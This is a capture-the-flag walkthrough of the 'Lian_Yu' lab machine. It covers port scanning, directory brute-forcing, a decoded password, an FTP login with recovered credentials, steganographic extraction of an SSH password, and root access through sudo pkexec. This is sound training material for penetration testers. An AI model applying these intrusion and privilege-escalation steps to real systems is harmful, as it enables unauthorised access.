21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_ 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 43835/tcp6 status
| 100024 1 48319/udp status
| 100024 1 57610/udp6 status
|_ 100024 1 58608/tcp status
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
A first gobuster scan reveals a hidden island directory
$ curl -s http://10.10.222.216/island/
<!DOCTYPE html>
<html>
<body>
<style>
</style>
<h1> Ohhh Noo, Don't Talk............... </h1>
<p> I wasn't Expecting You at this Moment. I will meet you there </p><!-- go!go!go! -->
<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</style></h2>
</body>
</html>
Reveals us a potential username vigilante, another deep dirsearch scan reveals another directory /2100
$ curl -s http://10.10.222.216/island/2100/
<!DOCTYPE html>
<html>
<body>
<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>
<p align=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how? -->
</header>
</body>
</html>
Here's there a hint saying we can avail our .ticket here - which means there is a .ticket extension in the medium.txt you can simply grep it or run the gobuster tool to find the file - green_arrow.ticket, This pages leads to :
$ curl -s http://10.10.97.18/island/2100/green_arrow.ticket
This is just a token to get into Queen's Gambit(Ship)
RTy8yhBQdscX
The string is base58 encoded and we have a valid username - vigiliante:!#th3h00d
Enumeration
Logging onto the FTP server with these credentials we get
$ ftp 10.10.97.18
Connected to 10.10.97.18 (10.10.97.18).
220 (vsFTPd 3.0.2)
Name (10.10.97.18:unknown): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
227 Entering Passive Mode (10,10,97,18,83,105).
150 Here comes the directory listing.
drwxr-xr-x 2 1001 1001 4096 May 05 11:10 .
drwxr-xr-x 4 0 0 4096 May 01 05:38 ..
-rw------- 1 1001 1001 44 May 01 07:13 .bash_history
-rw-r--r-- 1 1001 1001 220 May 01 05:38 .bash_logout
-rw-r--r-- 1 1001 1001 3515 May 01 05:38 .bashrc
-rw-r--r-- 1 0 0 2483 May 01 07:07 .other_user
-rw-r--r-- 1 1001 1001 675 May 01 05:38 .profile
-rw-r--r-- 1 0 0 511720 May 01 03:26 Leave_me_alone.png
-rw-r--r-- 1 0 0 549924 May 05 11:10 Queen's_Gambit.png
-rw-r--r-- 1 0 0 191026 May 01 03:25 aa.jpg
226 Directory send OK.
ftp> get .other_user
local: .other_user remote: .other_user
227 Entering Passive Mode (10,10,97,18,61,173).
150 Opening BINARY mode data connection for .other_user (2483 bytes).
226 Transfer complete.
2483 bytes received in 0.0029 secs (857.39 Kbytes/sec)
ftp> mget *
Analysing the *.png files discloses us a passphrase - Crack it using steg tools and the .other_user text file discloses us a potential username called slade
$ cat .other_user
Slade Wilson was 16 years old when he enlisted in the United States Army, having lied about his age. After serving a stint in Korea, he was later assigned to Camp Washington where he had been promoted to the rank of major. In the early 1960s, he met Captain Adeline Kane, who was tasked with training
Once we find the passphrase we can use it to extract ss.zip
$ unzip ss.zip
Archive: ss.zip
inflating: passwd.txt
inflating: shado
$ cat passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun ***
a small Note about it
Having spent years on the island, Oliver learned how to be resourceful and
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.
$ cat shado
M3tahuman
Now log on to the SSH service using the above credentials - grab the user.txt
Privilege Escalation
Listing the sudo permissions using the sudo -l command
slade@LianYu:~$ sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
Fire up gtfobins and search for pkexec binary - Grab the root flag !